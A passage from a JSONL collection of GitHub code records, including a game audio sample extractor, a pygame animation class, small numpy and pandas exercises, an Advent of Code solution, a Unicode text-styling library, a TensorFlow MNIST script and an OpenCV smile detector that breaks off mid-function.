0)\r\n\r\n\r\n # 0x44 loop context: predictor/scale\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x46 loop context: sample history (n-1)\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x48 loop context: sample history (n-2)\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x4A pad (reserved)\r\n header += struct.pack(\"22x\")\r\n\r\n\r\n return header\r\n\r\ndef read_u32_be(f):\r\n try:\r\n data = f.read(4)\r\n except EnvironmentError:\r\n sys.exit(\"ERROR: Read error at 0x%08X\" % f.tell())\r\n return struct.unpack(\">I\", data)[0]\r\n\r\ndef main(argc=len(sys.argv), argv=sys.argv):\r\n if argc != 2:\r\n print(\"Usage: %s \" % argv[0])\r\n return 1\r\n\r\n dir_in = os.path.realpath(argv[1])\r\n if os.path.isdir(dir_in) is not True:\r\n print(\"ERROR: Invalid directory path\")\r\n return 1\r\n\r\n hed_path = os.path.join(dir_in, \"bio4midi.hed\")\r\n if os.path.isfile(hed_path) is not True:\r\n print(\"ERROR: Could not find bio4midi.hed\")\r\n return 1\r\n\r\n dat_path = os.path.join(dir_in, \"bio4midi.dat\")\r\n if os.path.isfile(dat_path) is not True:\r\n print(\"ERROR: Could not find bio4midi.dat\")\r\n return 1\r\n\r\n num_banks = os.path.getsize(hed_path) // 4\r\n\r\n bank_offsets = []\r\n\r\n with open(hed_path, \"rb\") as hed:\r\n\r\n for i in xrange(num_banks):\r\n\r\n bank_offset = read_u32_be(hed)\r\n\r\n if (bank_offset == 0 and hed.tell() == 4) or (bank_offset != 0 and hed.tell() > 4):\r\n\r\n bank_offsets.append(bank_offset)\r\n\r\n with open(dat_path, \"rb\") as dat:\r\n\r\n bank_num = 0\r\n\r\n for bank_offset in bank_offsets:\r\n\r\n dat.seek(bank_offset + 0x24)\r\n\r\n info_size = read_u32_be(dat)\r\n\r\n dat.seek(4, os.SEEK_CUR)\r\n\r\n info_offset = read_u32_be(dat)\r\n\r\n dat.seek(20, os.SEEK_CUR)\r\n\r\n stream_size = read_u32_be(dat)\r\n\r\n dat.seek(4, os.SEEK_CUR)\r\n\r\n stream_offset = read_u32_be(dat)\r\n\r\n dat.seek(bank_offset + info_offset + 0x20)\r\n\r\n meta1_offset = read_u32_be(dat)\r\n\r\n meta2_offset = read_u32_be(dat)\r\n\r\n meta1_size = meta2_offset - meta1_offset\r\n meta1_size -= meta1_size % 16\r\n\r\n num_samples = meta1_size // 16\r\n\r\n dat.seek(bank_offset + info_offset + 16 + meta1_offset)\r\n\r\n meta = {}\r\n\r\n for i in xrange(num_samples):\r\n\r\n meta[i] = {}\r\n\r\n meta[i][\"rate\"] = read_u32_be(dat)\r\n meta[i][\"offset\"] = read_u32_be(dat)\r\n meta[i][\"samples\"] = read_u32_be(dat)\r\n\r\n # seek past sample number (2) and reserved slot(?) (2)\r\n dat.seek(4, os.SEEK_CUR)\r\n\r\n dat.seek(bank_offset + info_offset + 16 + meta2_offset)\r\n\r\n for i in xrange(num_samples):\r\n # coefficients\r\n meta[i][\"coeffs\"] = dat.read(32)\r\n\r\n # gain maybe .. ? 
skipping for now, should always be 0 anyway\r\n dat.seek(2, os.SEEK_CUR)\r\n\r\n # predictor/scale\r\n meta[i][\"ps\"] = dat.read(2)\r\n\r\n # not entirely sure what the other stuff is yet (but presumably just sample history 1/2, etc.)\r\n dat.seek(10, os.SEEK_CUR)\r\n\r\n for i in xrange(num_samples):\r\n\r\n dat.seek(bank_offset + stream_offset + (meta[i][\"offset\"] // 2))\r\n\r\n dsp_path = os.path.join(dir_in, (\"BANK%02d_%04d.dsp\" % (bank_num, i)))\r\n\r\n sample_size = samples_to_bytes(meta[i][\"samples\"])\r\n\r\n with open(dsp_path, \"wb\") as dsp:\r\n\r\n dsp.write( dsp_header(meta[i]) )\r\n\r\n extract_data(dat, dsp, sample_size)\r\n\r\n bank_num += 1\r\n\r\n return 0\r\n\r\nif __name__==\"__main__\":\r\n main()","repo_name":"Nisto/bio-tools","sub_path":"bio4/midi-smp-extract/midi-smp-extract.py","file_name":"midi-smp-extract.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"35911714400","text":"'A class for animations'\r\n#IMPORTS\r\nimport pygame\r\nfrom pathlib import Path\r\nfrom .core import load_image, most_used\r\n#IMPORTS\r\n\r\n#ANIMATIONS\r\nclass Animations:\r\n\t'''A class for animations\r\n\tNot all the animations should be done in one Animations class, it is good to create one for Entities and such\r\n\tIt can set an action when being initialised, even though no animation is created yet\r\n\r\n\tAttributes:\r\n\r\n\taction\r\n\r\n\tanimation_frames\r\n\r\n\tanimations_data\r\n\r\n\tframe'''\r\n\t#__INIT__\r\n\tdef __init__(self, action=None):\r\n\t\t'Initialising an Animations class'\r\n\t\tself.animations_data = {}\r\n\t\tself.animation_frames = {}\r\n\t\tself.action = action\r\n\t\tself.frame = 0\r\n\t#__INIT__\r\n\r\n\t#__REPR__\r\n\tdef __repr__(self):\r\n\t\t'''Returns a string representation of the object\r\n\r\n\t\tReturns: str'''\r\n\t\treturn 'pgeng.Animations'\r\n\t#__REPR__\r\n\r\n\t#ADD_ANIMATION\r\n\tdef load_animation(self, path, frame_durations, repeat=True, colourkey=None, file_type=None, animation_name=None, alpha=255, convert_alpha=False):\r\n\t\t'''A function for loading still images for a animation\r\n\r\n\t\tIt loads all images in a directory, the last character before the file type needs to be a number\r\n\t\tThe name of the directory it is in needs to be in the file name (directories above that don't matter),\r\n\t\tThe file type of the frames should be the most used file type in the directory\r\n\t\tExample:\r\n\t\t\t'run/run1.png'\r\n\t\t\t'run/run2.png'\r\n\r\n\t\tOr you can use file_type variable\r\n\t\tExample:\r\n\t\t\tfile_type='.png'\r\n\r\n\t\tIf you don't want the name of the directory to be the name of the animation, you could use animation_name\r\n\t\tIf you do that, the file name should still be the same as the directory\r\n\r\n\t\tframe_durations is a list or tuple with how long each frame should last, it has to be in order\r\n\t\trepeat is if the animation should loop, if it is False, the image would stay on the last one\r\n\t\tThe images will be added to animation_frames'''\r\n\t\tpath = Path(path).resolve()\r\n\t\tif not path.is_dir():\r\n\t\t\traise FileNotFoundError(f'Directory \\'{path}\\' does not exist')\r\n\t\tanimation_name = path.name if animation_name is None else animation_name\r\n\t\tself.animations_data[animation_name] = [[], repeat, 0]\r\n\t\tif not file_type:\r\n\t\t\tfile_type = most_used([file.suffix for file in path.iterdir() if file.is_file()])[0]\r\n\t\tfor i, frame_duration in 
enumerate(frame_durations):\r\n\t\t\tif not path.joinpath(f'{path.name}{i + 1}{file_type}').is_file():\r\n\t\t\t\traise pygame.error(f'Too many non image files in \\'{path}\\' or the image file is not named \\'{path.name}{i + 1}{file_type}\\'')\r\n\t\t\tanimation_frame_id = f'{animation_name}{i + 1}'\r\n\t\t\tself.animation_frames[animation_frame_id] = load_image(path.joinpath(f'{path.name}{i + 1}{file_type}'), colourkey, alpha, convert_alpha)\r\n\t\t\tself.animations_data[animation_name][0].append((animation_frame_id, frame_duration))\r\n\t\t\tself.animations_data[animation_name][2] += frame_duration\r\n\t#ADD_ANIMATION\r\n\r\n\t#ADD_IMAGE\r\n\tdef add_image(self, image, animation_name, duration, repeat=True):\r\n\t\t'''Manually add an image to an animation\r\n\t\tIf the animation_name does not yet exist, it will be created\r\n\t\tThe image will be added to animation_frames with a number, so it has to be added in the correct order'''\r\n\t\tif animation_name not in self.animations_data:\r\n\t\t\tself.animations_data[animation_name] = [[], repeat, 0]\r\n\t\tanimation_frame_id = f'{animation_name}{len(self.animations_data[animation_name][0]) + 1}'\r\n\t\tself.animation_frames[animation_frame_id] = image.copy()\r\n\t\tself.animations_data[animation_name][0].append((animation_frame_id, duration))\r\n\t\tself.animations_data[animation_name][2] += duration\r\n\t#ADD_IMAGE\r\n\r\n\t#CURRENT_IMAGE\r\n\tdef current_image(self, delta_time=1):\r\n\t\t'''Get the current image in the animation\r\n\t\tdelta_time is how much the frame should update, usually it would be 1\r\n\r\n\t\tReturns: pygame.Surface'''\r\n\t\tif self.action not in self.animations_data:\r\n\t\t\traise KeyError(f'Animation \\'{self.action}\\' is not defined')\r\n\t\tanimation_data = self.animations_data[self.action]\r\n\t\tself.frame += delta_time\r\n\t\treset_frame = round(self.frame) > animation_data[2]\r\n\t\tif reset_frame and animation_data[1]:\r\n\t\t\tself.frame = 0\r\n\t\telif reset_frame and not animation_data[1]:\r\n\t\t\tself.frame = animation_data[2]\r\n\t\tfor i, frame_data in enumerate(animation_data[0]):\r\n\t\t\tif round(self.frame) <= sum([frame_duration[1] for frame_duration in animation_data[0]][:i + 1]):\r\n\t\t\t\treturn self.animation_frames[frame_data[0]]\r\n\t#CURRENT_IMAGE\r\n\r\n\t#SET_ACTION\r\n\tdef set_action(self, action):\r\n\t\t'Set the current action, the frame will also be reset to 0'\r\n\t\tif action not in self.animations_data:\r\n\t\t\traise KeyError(f'Animation \\'{action}\\' is not defined')\r\n\t\tif self.action != action:\r\n\t\t\tself.action = action\r\n\t\t\tself.frame = 0\r\n\t#SET_ACTION\r\n#ANIMATIONS","repo_name":"Bouncehball/pgeng","sub_path":"pgeng/animations.py","file_name":"animations.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"35422247521","text":"import numpy as np\nimport pandas\n\n#Punto 1\nrandomArray = np.random.randint(10000, size=100)\nmedianValue = np.median(randomArray)\n\n#Punto 2\ndef factorial(n):\n    return np.math.factorial(n)\n\ndef sumOfSeries(num1, num2):\n    arr = np.arange(num1, num2+1)\n    print(arr)\n    if num1 >= num2:\n        return \"the first number must be smaller than the second\"\n    else:\n        return np.sum(arr)\n\n#Punto 3\ndef salariosNetos():\n    salariosCSV = pandas.read_csv('./Salarios.csv')\n    salariosNetos = salariosCSV.loc[:,'Salario mensual NETO (en tu moneda local)'].to_numpy()\n    salariosNetos = salariosNetos.astype(int)\n    return \"Median: \" + 
str(np.median(salariosNetos)) + \" Mean: \" + str(np.mean(salariosNetos))\n\n\n\n\n","repo_name":"MartinFarres/Coder","sub_path":"Arrays Farres.py","file_name":"Arrays Farres.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9083674664","text":"BORDER = 10\n\nwith open(\"day9/input.txt\", 'r') as file:\n heightmap = [[int(char) for char in line.strip('\\n')] for line in file]\n #print(heightmap)\n\nlow_points = []\n\n### PART 1 ###\ndef find_neighbours(heightmap, row, col):\n north = heightmap[row - 1][col] if row - 1 >= 0 else BORDER\n west = heightmap[row][col - 1] if col - 1 >= 0 else BORDER\n east = heightmap[row][col + 1] if col + 1 < len(heightmap[row]) else BORDER\n south = heightmap[row + 1][col] if row + 1 < len(heightmap) else BORDER\n return [height for height in [north, west, east, south] if height < BORDER]\n\nsum_risk_level = 0\nfor row in range(len(heightmap)):\n for col in range(len(heightmap[row])):\n neighbours = find_neighbours(heightmap, row, col)\n current = heightmap[row][col]\n if all(current < neighbour for neighbour in neighbours):\n #print(f\"Current [{row}][{col}]: {current}\")\n #print(neighbours)\n low_points.append((row, col))\n sum_risk_level += current + 1\n\n### PART 1 ANSWER: \n#print(sum_risk_level)\n\n\n### PART 2 ###\ndef rec_determine_basin_size(heightmap, basin_points_set, point):\n row = point[0]\n col = point[1]\n basin_points_set.add(point)\n\n north = (row - 1, col) if row - 1 >= 0 else (-1, -1)\n west = (row, col - 1) if col - 1 >= 0 else (-1, -1)\n east = (row, col + 1) if col + 1 < len(heightmap[row]) else (-1, -1)\n south = (row + 1, col) if row + 1 < len(heightmap) else (-1, -1)\n\n neighbours = [tup for tup in [north, west, east, south] if tup != (-1, -1) and heightmap[tup[0]][tup[1]] < 9]\n for t in neighbours:\n neighbour_height = heightmap[t[0]][t[1]]\n if neighbour_height > heightmap[row][col] and t not in basin_points_set and neighbour_height != 9:\n rec_determine_basin_size(heightmap, basin_points_set, t)\n \n return len(basin_points_set)\n\nbasin_sizes = []\nfor point in low_points:\n size = rec_determine_basin_size(heightmap, set(), point)\n basin_sizes.append(size)\n\n### PART 2 ANSWER:\nbasin_sizes.sort(reverse=True)\nresult = basin_sizes[0] * basin_sizes[1] * basin_sizes[2]\nprint(result)\n","repo_name":"victorthedude/Advent-of-Code-2021","sub_path":"day9/smoke_basin.py","file_name":"smoke_basin.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73613084084","text":"# coding:utf-8\nimport pandas as pd\nimport numpy as np\n\nif __name__ == '__main__':\n path = '8名学生的考试成绩数据.csv'\n data = pd.read_csv(path, encoding='utf-8', delimiter=',')\n # 找出统计学等于75分的学生\n a1 = data.query('统计学成绩==[\"75\"]')\n print(a1['姓名'].values)\n # ['赵颖' '袁方']\n\n # 英语成绩最高的前三名学生\n data['row_number'] = data['英语成绩'].rank(ascending=0, method='first').astype(int)\n print(data[data['row_number'] <= 3]['姓名'].values)\n # ['王翔' '李华' '陈风']\n\n # 四门课程都大于70分的学生\n a2 = data[(data['英语成绩'] > 70) & (data['统计学成绩'] > 70) & (data['数学成绩'] > 70) & (data['经济学成绩'] > 70)]['姓名'].values\n print(a2)\n # ['王翔' '赵颖' '陈风']\n","repo_name":"XuanmoFeng/note","sub_path":"学习内容/统计学/code/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} 
+{"seq_id":"32491774830","text":"\"\"\"Convert Unicode characters.\"\"\"\nimport pathlib\nimport re\nfrom typing import Any, Dict, MutableMapping, Optional\n\nimport toml\n\nfrom . import exceptions\n\n\nclass Translator(dict):\n \"\"\"Translator for converting text to Unicode.\n\n Attributes:\n items (Dict[str, str]): Keys and values to prepopulate Translator.\n Optional.\n strict_case (bool): Whether to forbid characters from being\n converted to an upper or lower case counterpart if an exact\n match is not found. By default set to False.\n \"\"\"\n\n def __init__(\n self, items: Optional[Dict[str, str]] = None, strict_case: bool = False\n ) -> None:\n \"\"\"Constructor.\"\"\"\n if items is not None:\n self.update(items)\n self.strict_case = strict_case\n pass\n\n def __repr__(self) -> str:\n \"\"\"Representation of Translator.\"\"\"\n dict_repr = (\n \"{\"\n + \", \".join(\n \": \".join((f\"'{item}'\", f\"'{key}'\")) for item, key in self.items()\n )\n + \"}\"\n )\n return f\"Translator({dict_repr}, {self.strict_case})\"\n\n def __missing__(self, key: str) -> str:\n \"\"\"Return value in the case of a missing key.\n\n If ``strict_case`` is True, will return the key itself. If\n False, will first try to return a value matching the upper or\n lowercase variant of the key.\n\n Args:\n key (str): The key missing from Translator.\n\n Returns:\n str: The returned value.\n \"\"\"\n if self.strict_case:\n return key\n else:\n if key.upper() in self:\n return self[key.upper()]\n elif key.lower() in self:\n return self[key.lower()]\n else:\n return key\n\n\ndef _read_translator(strict_case: bool = False) -> MutableMapping[str, Any]:\n \"\"\"Read translator from config file.\n\n Args:\n strict_case (bool): Whether to forbid characters from being\n converted to an upper or lower case counterpart if an exact\n match is not found. By default set to False.\n\n Returns:\n MutableMapping[str, Any]: A dictionary where the keys are the\n unicode type, and the values are nested dictionaries with the\n keys are typical characters and the values are their\n converted unicode.\n \"\"\"\n toml_path = pathlib.Path(__file__).parent / pathlib.Path(\"translator.toml\")\n toml_text = toml_path.read_text()\n unicode_mapping = toml.loads(toml_text)\n translator = {\n unicode_type: Translator(unicode_mapping[unicode_type], strict_case=strict_case)\n for unicode_type in unicode_mapping\n }\n return translator\n\n\ndef _format_names(name: str) -> str:\n \"\"\"Format dictionary key names to be human friendly.\n\n Args:\n name (str): The Unicode type name.\n\n Returns:\n str: The formatted Unicode type name.\n \"\"\"\n return name[0].upper() + name[1:].replace(\"_\", \" \")\n\n\ndef show_all(\n characters: str, strict_case: bool = False, reverse: bool = False\n) -> Dict[str, str]:\n \"\"\"Return all possible unicode conversions.\n\n Args:\n characters (str): The characters to convert.\n strict_case (bool): Whether to forbid a character from being\n converted to its lower or upper case counterpart if an exact\n mapping is not found. By default False.\n reverse (bool): Whether to reverse the returned characters. This\n can be useful when converting to ``unicode_type``\n \"inverted\" or \"reverse\". 
By default False.\n\n    Returns:\n        Dict[str, str]: A dictionary with the converted characters.\n\n        The dictionary keys are the names of character types and the\n        values are the converted characters.\n\n    Example:\n        Show all possible conversions for the string \"Hello\".\n\n        >>> import dressup\n        >>> dressup.show_all(\"Hello\")\n        {'Circle': 'Ⓗⓔⓛⓛⓞ', 'Negative circle': '🅗🅔🅛🅛🅞',\n        'Monospace': 'Hello', 'Math bold': '𝐇𝐞𝐥𝐥𝐨',\n        'Math bold fraktur': '𝕳𝖊𝖑𝖑𝖔', 'Math bold italic': '𝑯𝒆𝒍𝒍𝒐',\n        'Math bold script': '𝓗𝓮𝓵𝓵𝓸', 'Math double struck': 'ℍ𝕖𝕝𝕝𝕠',\n        'Math monospace': '𝙷𝚎𝚕𝚕𝚘', 'Math sans': '𝖧𝖾𝗅𝗅𝗈', 'Math sans bold':\n        '𝗛𝗲𝗹𝗹𝗼', 'Math sans bold italic': '𝙃𝙚𝙡𝙡𝙤', 'Math sans italic':\n        '𝘏𝘦𝘭𝘭𝘰', 'Parenthesized': '⒣⒠⒧⒧⒪', 'Square': '🄷🄴🄻🄻🄾',\n        'Negative square': '🅷🅴🅻🅻🅾', 'Cute': 'Héĺĺő', 'Math fraktur':\n        'ℌ𝔢𝔩𝔩𝔬', 'Rock dots': 'Ḧëḷḷö', 'Small caps': 'ʜᴇʟʟᴏ', 'Stroked':\n        'Ħɇłłø', 'Subscript': 'ₕₑₗₗₒ', 'Superscript': 'ᴴᵉˡˡᵒ',\n        'Inverted': 'ɥǝןןo', 'Reversed': 'Hɘ⅃⅃o'}\n    \"\"\"\n    translator = _read_translator(strict_case=strict_case)\n    if reverse:\n        characters = characters[::-1]\n    converted_characters = {\n        _format_names(character_type): \"\".join(\n            translator[normalize_text(character_type)][character]\n            for character in characters\n        )\n        for character_type in translator\n    }\n\n    return converted_characters\n\n\ndef normalize_text(text_input: str) -> str:\n    \"\"\"Normalize inputted text for easy dictionary matching.\n\n    Strips surrounding whitespace, changes all characters to lowercase,\n    and replaces inner whitespace with \"_\".\n\n    Args:\n        text_input (str): An inputted name.\n\n    Returns:\n        str: A normalized version of the name.\n    \"\"\"\n    return re.sub(r\"\\s+\", \"_\", text_input.strip().lower().replace(\"-\", \"_\"))\n\n\ndef convert(\n    characters: str, unicode_type: str, strict_case: bool = False, reverse: bool = False\n) -> str:\n    \"\"\"Convert characters to a Unicode character type.\n\n    Args:\n        characters (str): The characters to convert.\n        unicode_type (str): The type of Unicode character types to\n            convert to. Valid values are \"circle\", \"negative circle\",\n            \"monospace\", \"math bold\", \"math bold fraktur\",\n            \"math bold italic\", \"math bold script\",\n            \"math double struck\", \"math monospace\",\n            \"math sans\", \"math sans bold\", \"math sans bold italic\",\n            \"math sans italic\", \"parenthesized\", \"square\",\n            \"negative square\", \"cute\", \"math fraktur\", \"rock dots\",\n            \"small caps\", \"stroked\", \"subscript\", \"superscript\",\n            \"inverted\", and \"reversed\".\n        strict_case (bool): Whether to forbid a character from being\n            converted to its lower or upper case counterpart if an exact\n            mapping is not found. By default False.\n        reverse (bool): Whether to reverse the returned characters. This\n            can be useful when converting to ``unicode_type``\n            \"inverted\" or \"reversed\". By default False.\n\n    Returns:\n        str: The converted Unicode characters.\n\n    Raises:\n        InvalidUnicodeTypeError: Raised if value inputted in\n            ``unicode_type`` is invalid.\n\n    Examples:\n        Convert the string \"Hello\" to negative circle characters.\n\n        >>> import dressup\n        >>> dressup.convert(\"Hello\", unicode_type=\"negative circle\")\n        '🅗🅔🅛🅛🅞'\n\n        Convert the string \"Hello\" to negative circle characters, but\n        don't convert lowercase to uppercase if a perfect match isn't\n        found.\n\n        >>> import dressup\n        >>> dressup.convert(\n        ...     \"Hello\",\n        ...     unicode_type=\"negative circle\",\n        ...     strict_case=True,\n        ... 
)\n        '🅗ello'\n\n        Convert the string \"Hello\" to reversed characters, reversing the\n        output order as well.\n\n        >>> import dressup\n        >>> dressup.convert(\n        ...     \"Hello\",\n        ...     unicode_type=\"reversed\",\n        ...     reverse=True,\n        ... )\n        'o⅃⅃ɘH'\n        \"\"\"\n    unicode_type = normalize_text(unicode_type)\n    translator = _read_translator()\n    if reverse:\n        characters = characters[::-1]\n    try:\n        type_mapping = translator[unicode_type]\n    except KeyError as error:\n        valid_types = \", \".join(translator.keys())\n        raise exceptions.InvalidUnicodeTypeError(\n            f\"'{unicode_type}' is not a valid Unicode type.\"\n            f\" Valid types are {valid_types}.\"\n        ) from error\n    if strict_case:\n        converted_character = \"\".join(\n            type_mapping.get(character, character) for character in characters\n        )\n    else:\n        converted_character = \"\".join(\n            type_mapping.get(\n                character,\n                type_mapping.get(\n                    character.upper(), type_mapping.get(character.lower(), character)\n                ),\n            )\n            for character in characters\n        )\n    return converted_character\n","repo_name":"paw-lu/dressup","sub_path":"src/dressup/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":8945,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"76"} +{"seq_id":"14790937440","text":"# Usage: tf_ptq_dnn.py --tfmodel models/baseline_dnn_32bit.tf\nimport tensorflow as tf\nimport larq as lq\nfrom sklearn.preprocessing import LabelEncoder\nimport time\nimport argparse\nimport numpy as np\nimport tempfile\nimport os\nfrom simple_network import MyNet\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-m\", \"--tfmodel\", required=True,\n\thelp=\"path to output model\")\n\nargs = vars(ap.parse_args())\n\n(train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.mnist.load_data()\n\ntrain_images = train_images.reshape((60000, 28, 28, 1))\ntest_images = test_images.reshape((10000, 28, 28, 1))\n\ntrain_labels = LabelEncoder().fit_transform(train_labels)\ntest_labels = LabelEncoder().fit_transform(test_labels)\n\n# Normalize pixel values to be between 0 and 1 (the -1..1 variant is kept commented out)\n#train_images, test_images = train_images / 127.5 - 1, test_images / 127.5 - 1\ntrain_images = train_images.astype(np.float32) / 255.0\ntest_images = test_images.astype(np.float32) / 255.0\n\ninput_layer = tf.keras.layers.Input(shape=(28, 28, 1))\nx = MyNet(classes = 10)(input_layer)\nmodel = tf.keras.models.Model(inputs=input_layer, outputs=x)\n\nmodel.summary()\nlq.models.summary(model)\n\nmodel.compile(optimizer='adam',\n              loss='sparse_categorical_crossentropy',\n              metrics=['accuracy'])\n\nmodel.fit(train_images, train_labels, batch_size=64, epochs=6)\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels)\n\nprint(f\"Test accuracy {test_acc * 100:.2f} %\")\n\nprint(\"[INFO] serializing model...\")\nmodel.save(args[\"tfmodel\"])","repo_name":"satya15july/quantization","sub_path":"tensorflow/tf_dnn.py","file_name":"tf_dnn.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"29061016218","text":"#!/usr/bin/env python\nimport cv2.cv as cv\nimport cv2\nimport time\nimport Image\nimport threading\n###########################\nimport matplotlib\nimport datetime\nimport matplotlib.dates as md\n##########################\n\ncv.NamedWindow(\"camera\", 1)\ncapture = cv.CreateCameraCapture(0)\n\n#font = cv.CvFont\nfont = cv.InitFont(1, 1, 1, 1, 1, 1)\n\nwidth = None\nheight = None\nwidth = 640#480 #320\nheight = 480 #360#240\nsmileness = 
0\nsmilecount = 0\n\nif width is None:\n width = int(cv.GetCaptureProperty(capture, cv.CV_CAP_PROP_FRAME_WIDTH))\nelse:\n cv.SetCaptureProperty(capture,cv.CV_CAP_PROP_FRAME_WIDTH,width) \n\nif height is None:\n height = int(cv.GetCaptureProperty(capture, cv.CV_CAP_PROP_FRAME_HEIGHT))\nelse:\n cv.SetCaptureProperty(capture,cv.CV_CAP_PROP_FRAME_HEIGHT,height) \n\nresult = cv.CreateImage((width,height),cv.IPL_DEPTH_8U,3) \n\nmqLoop = 0\n\n\n\n\ndef DetectRedEyes(image, faceCascade, smileCascade):\n min_size = (20,20)\n image_scale = 2\n haar_scale = 1.2\n min_neighbors = 2\n haar_flags = 0\n\n # Allocate the temporary images\n gray = cv.CreateImage((image.width, image.height), 8, 1)\n smallImage = cv.CreateImage((cv.Round(image.width / image_scale),cv.Round (image.height / image_scale)), 8 ,1)\n\n # Convert color input image to grayscale\n cv.CvtColor(image, gray, cv.CV_BGR2GRAY)\n\n # Scale input image for faster processing\n cv.Resize(gray, smallImage, cv.CV_INTER_LINEAR)\n\n # Equalize the histogram\n cv.EqualizeHist(smallImage, smallImage)\n\n # Detect the faces\n faces = cv.HaarDetectObjects(smallImage, faceCascade, cv.CreateMemStorage(0),\n haar_scale, min_neighbors, haar_flags, min_size)\n\n # If faces are found\n if faces:\n \n #print faces\n\n for ((x, y, w, h), n) in faces:\n # the input to cv.HaarDetectObjects was resized, so scale the\n # bounding box of each face and convert it to two CvPoints\n #print \"face\"\n pt1 = (int(x * image_scale), int(y * image_scale))\n pt2 = (int((x + w) * image_scale), int((y + h) * image_scale))\n # print pt1\n # print pt2\n #cv.Rectangle(image, pt1, pt2, cv.RGB(255, 0, 0), 1, 8, 0)\n #corner 1\n #str(pt2[1] - pt1[1])\n #cv.PutText(image, \"hi!\", pt1, font, cv.RGB(255, 0, 0))\n \n #cv.PutText(image, \"(pt1[0],pt1[1])\", pt1, font, cv.RGB(255, 0, 0))\n #corner 2\n #cv.PutText(image, \"(pt2[0],pt1[1])\", (pt2[0],pt1[1]), font, cv.RGB(255, 0, 0))\n #corner 3\n #cv.PutText(image, \"(pt1[0],pt2[1])\", (pt1[0],pt2[1]), font, cv.RGB(255, 0, 0))\n #corner 4\n #cv.PutText(image, \"(pt2[0],pt2[1])\", pt2, font, cv.RGB(255, 0, 0))\n #face_region = cv.GetSubRect(image,(x,int(y + (h/4)),w,int(h/2))) \n #split face\n #cv.Rectangle(image, (pt1[0],(pt1[1] + (abs(pt1[1]-pt2[1]) / 2 ))), pt2, cv.RGB(0,255,0), 1, 8, 0)\n #cv.PutText(image, \"isolating lower\", (pt1[0],(pt1[1] + (abs(pt1[1]-pt2[1]) / 2 ))), font, cv.RGB(0, 255, 0))\n \n cv.SetImageROI(image, (pt1[0],\n (pt1[1] + int(abs(pt1[1]-pt2[1]) / 1.6 )),\n pt2[0] - pt1[0],\n int((pt2[1] - (pt1[1] + int(abs(pt1[1]-pt2[1]) / 1.6 ))))))\n \n smiles = cv.HaarDetectObjects(image, smileCascade, cv.CreateMemStorage(0), 1.1, 5, 0, (15,15))\n \n if smiles:\n #print smiles\n \n for smile in smiles:\n #cv.Rectangle(image,\n #(smile[0][0],smile[0][1]),\n #(smile[0][0] + smile[0][2], smile[0][1] + smile[0][3]),\n #cv.RGB(0, 0, 255), 1, 8, 0)\n\n #cv.PutText(image, \"smile\", (smile[0][0],smile[0][1]), font, cv.RGB(0, 0, 255))\n \n #cv.PutText(image,str(smile[1]), (smile[0][0], smile[0][1] + smile[0][3]), font, cv.RGB(0, 0, 255))\n \n \n #print ((abs(smile[0][1] - smile[0][2]) / abs(pt1[0] - pt2[0])) * 100)\n cv.ResetImageROI(image)\n if smile[1] + smile[0][3] > 45:\n cv.Circle(image, ( (pt1[0] +pt2[0])/2 ,(pt1[1] + pt2[1])/2 ), w, (47,255,173), -1, lineType=8, shift=0)\n #cv.SetImageROI(image,(pt1[0] +pt2[0])/2 ,(pt1[1] + pt2[1])/2 ) ,)\n smilept1 = (int((pt1[0] + (pt1[0]+pt2[0])/2)/2),int((pt2[1] + (pt1[1] + pt2[1])/2 ))/2)\n smilept2 = (int(((pt1[0]+pt2[0])/2+pt2[0])/2),pt2[1])# int(((pt1[1]+pt2[1])/2 + pt2[1])/2))\n 
#cv.Rectangle(image, smilept1, smilept2, cv.RGB(0,255,0), 1, 8, 0)\r\n                        #cv2.ellipse(image,(256,256),(100,50),0,0,180,255,-1)\r\n                        #cv.SetImageROI(image, (smilept1[0], smilept1[1], smilept2[0]-smilept1[0], smilept2[1]-smilept1[1]))\r\n                        #cv.Circle(image, ( (pt1[0] +pt2[0])/2,(pt1[1] + pt2[1])/2+40), int(w/1.2), (0,0,0), -1, lineType=8, shift=0)\r\n                        cv.Ellipse(image, ((pt1[0] +pt2[0])/2 ,(pt1[1] + pt2[1])/2 + int(w/7) ), (int(w/1.7),h/2), 270, 90, 270, (0,0,0), thickness=4, lineType=4, shift=0)\r\n                        eyept1 = (int((pt1[0] + (pt1[0]+pt2[0])/2)/2),int((pt1[1] + (pt1[1] + pt2[1])/2 ))/2)\r\n                        eyept2 = (int(((pt1[0]+pt2[0])/2+pt2[0])/2),int(((pt1[1]+pt2[1])/2 + pt1[1])/2))\r\n                        cv.Circle(image, eyept1, int(w/9), (0,0,0), -1, lineType=8, shift=0)\r\n                        cv.Circle(image, eyept2, int(w/9), (0,0,0), -1, lineType=8, shift=0)\r\n                        \r\n                        global smileness \r\n                        smileness = smile[1]\r\n                        cv.SetImageROI(image, (pt1[0],\r\n                                       (pt1[1] + int(abs(pt1[1]-pt2[1]) / 1.6 )),\r\n                                       pt2[0] - pt1[0],\r\n                                       int((pt2[1] - (pt1[1] + (abs(pt1[1]-pt2[1]) / 1.6 ))))))\r\n                    else:\r\n                        cv.ResetImageROI(image)\r\n                        cv.Circle(image, ( (pt1[0] +pt2[0])/2 ,(pt1[1] + pt2[1])/2 ), w, (0,0,255), -1, lineType=8, shift=0)\r\n                        eyept1 = (int((pt1[0] + (pt1[0]+pt2[0])/2)/2),int((pt1[1] + (pt1[1] + 